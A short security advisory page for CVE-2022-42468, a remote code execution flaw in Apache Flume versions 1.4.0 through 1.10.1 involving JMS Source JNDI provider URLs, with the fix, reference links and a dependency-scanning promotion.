CVE-2022-42468: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
(updated )
Apache Flume versions 1.4.0 through 1.10.1 is vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with an unsafe providerURL. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.
References
- github.com/advisories/GHSA-9w4g-fp9h-3q2v
- github.com/apache/flume/commit/eee179a09df405c1ab55ae25a53b76ca1050bb97
- issues.apache.org/jira/browse/FLUME-3437
- lists.apache.org/thread/1ckhmp539zr2nd2rs45pocpywk2d9zvz
- lists.apache.org/thread/939wkx8o90bp6m2ht3t1sdyo1ncypl78
- nvd.nist.gov/vuln/detail/CVE-2022-42468
Detect and mitigate CVE-2022-42468 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →